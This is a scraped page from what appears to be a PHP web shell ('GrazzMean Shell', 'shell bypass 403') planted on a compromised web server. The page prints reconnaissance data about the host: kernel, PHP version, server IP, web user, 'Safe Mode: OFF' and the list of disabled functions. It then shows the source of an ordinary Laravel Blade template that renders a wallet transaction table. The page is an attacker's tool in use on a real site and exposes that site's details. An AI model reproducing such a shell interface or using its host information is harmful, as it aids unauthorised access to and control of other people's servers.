shell bypass 403

GrazzMean Shell

Uname: Linux peekpos.com 6.8.0-1060-aws #63~22.04.1-Ubuntu SMP Tue Jun 30 02:32:53 UTC 2026 x86_64
Software: Apache
PHP version: 8.3.25 [ PHP INFO ] PHP os: Linux
Server Ip: 47.130.192.226
Your Ip: 10.1.31.86
User: www (1001) | Group: www (1001)
Safe Mode: OFF
Disable Function:
passthru,putenv,chroot,chgrp,chown,shell_exec,popen,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

name : transactiontable.blade.php
<table class="table table-striped table-bordered zero-configuration">
    <thead>
        <tr>
            <th>#</th>
            <th>{{ trans('labels.date') }}</th>
            <th>{{ trans('labels.description') }}</th>
            <th>{{ trans('labels.amount') }}</th>
        </tr>
    </thead>
    <tbody>
        @php $i = 1; @endphp
        @foreach ($gettransactions as $tdata)
            <tr>
                <td>@php echo $i++; @endphp</td>
                <td>{{ helper::date_format($tdata->created_at) }}</td>
                <td>
                    @if (in_array($tdata->transaction_type, [101, 102, 103]))
                        {{ trans('labels.wallet_recharge') }}
                        [
                            @if ($tdata->transaction_type == 102)
                                {{ trans('labels.added_by_admin') }}
                            @elseif ($tdata->transaction_type == 103)
                                {{ trans('labels.deducted_by_admin') }}
                            @endif
                        ]
                    @elseif(in_array($tdata->transaction_type, [3, 4, 5, 6 , 7, 8, 9, 10, 11, 12, 13, 14]))
                        {{ helper::getpayment($tdata->transaction_type) }}
                        {{ $tdata->transaction_id }}
                    @elseif ($tdata->transaction_type == 2)
                        {{ trans('labels.order_cancelled') }}
                    @elseif ($tdata->transaction_type == 1)
                        {{ trans('labels.order_placed') }}
                    @elseif ($tdata->transaction_type == 101)
                        {{ trans('labels.referral_earning') }}
                        [{{ $tdata->username }}]
                    @else
                        -
                    @endif
                    @if (in_array($tdata->transaction_type, [1, 2]))
                        [{{ $tdata->order_number }}]
                    @endif
                </td>
                <td
                    class="{{ in_array($tdata->transaction_type, [102, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]) == true ? 'text-success' : 'text-danger' }}">
                    {{ helper::currency_format($tdata->amount) }}</td>
            </tr>
        @endforeach
    </tbody>
</table>
© 2026 GrazzMean